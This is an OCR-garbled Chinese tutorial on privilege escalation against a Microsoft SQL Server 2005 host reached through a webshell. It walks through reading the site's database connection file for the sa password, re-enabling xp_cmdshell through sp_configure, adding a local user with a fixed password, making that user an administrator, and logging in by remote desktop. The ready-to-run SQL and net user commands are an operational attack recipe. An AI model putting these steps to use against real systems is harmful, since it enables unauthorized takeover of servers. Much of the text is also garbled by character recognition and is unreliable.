Microsoft SQL Server 2005 &&Microsoft SQL Server 2008都将xp_cmdshell 等 危险存储过程删除了，但这个并不影响提权，只要获取了sa口令，重新添加存储过程，即 可跟MSSSQL 2000 server—样提权。Microsoft SQL Server 2005提权的思路很简单，需 要获取数据库的用户名和密码，然后通过恢复存储过程命令，下面是详细的提权过程。
查看数据库连接文件
通过Webshell查看网站的源代码，通过分析首页default, asp文件获知数
据库连接文件为opencormectiou^
图1分析首页文件
技巧：
数据库连接文件一般名称为 corm. asp、openconnectiong. asp、connection, asp 以及其 它名称，这些文件一般位于网站根目录或者位于仏()1化^等文件夹，通过查看首页代码一 般都能准确的找到数据库连接文件。
获取数据库用户和密码
找到数据库连接文件0?6此0^^(^10卩.33?后，将其下载到本地后打开，如图2所示， 知道数据库用户为“sa”，密码为“Tp*****234”，将其复制出来留待后面用。

获取数据库用户和密码
数据库连接设置
在连接組^080代SQL Server 2005前需要对数据库进行设置，需要知道88用户的密 码和数据库，默认采用master数据库，在“CormString”中修改相应的设置，主要在数据 库类型中选择相对应的数据库类型，在如匕1^11中单击“0站油3阳”，如图3所示，设置完 毕后单击“Go”按钮进行数据库连接测试。
设置MSSQL连接 查看连接信息
如果数据库用户名、密码以及数据库名称均设置正确，连接成功后会显示显示的信息， 如图4所示，会显示MSSQL Version : Microsoft SQL Server 2005 - 9. 00. 4035. 00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6001: Service Pack 1)以及 “SrvRoleMember : sa，，。 表明数据库版本为“icrosoft SQL Server 2005 - 9. 00. 4035. 00”，数据库用户角色是“sa”。
添加“xp_cmdshell”存储过程
可以直接在 “Run SQL” 中输入 “Exec sp_configure ’show advanced options，,1;REC0NFIGURE;EXEC sp_configure , xp_cmdshell，,1;REC0NFIGURE; ” 脚本添加 “xp_cmdshell”存储过程，也可以通过？6匕81^11进行，如图5所示，在“SQLExec”执行 中选^第三个命令 “Add xp_cmdshell (SQL2005),?即可。
在sqlexec中选择“xp cmdshell exec”webshell会自动给出脚本“exec master.dbo.xp_cmdshell 'net user'”，修改其添加用户命令，即“exex master，dbo. xp_cmdshell，net user temp Wantiap365.|om!* /add ’ ”，将添加用户 temp, “Wantian365.com!*”，如图6所示，单击“Quer^”执行添加用户命令。
在SQLExec中继续选择“XP_cmdshell exec”，然后将temp用户添加到管理员组，即命 令 “Exec master, dbo. xp_cmdshell * net localgroup administrators temp /add *，，，添 加成功后。
添加temp用户为管理员
通过“XP—cmdshell exec”查看系统用户
选择89[£16。中选择“乂?_0^^81^11 exec”，？6匕81^11会自动给出脚本“£又60 master, dbo. xp_cmdshell ’net user’”，如图8所示，单击“9此^”查询系统的用户，如 图9所示，temp用户已经添加到系统中。
打开远程终端连接，登陆，输入：
进入操作系统，该操作系统为windows 2008 server。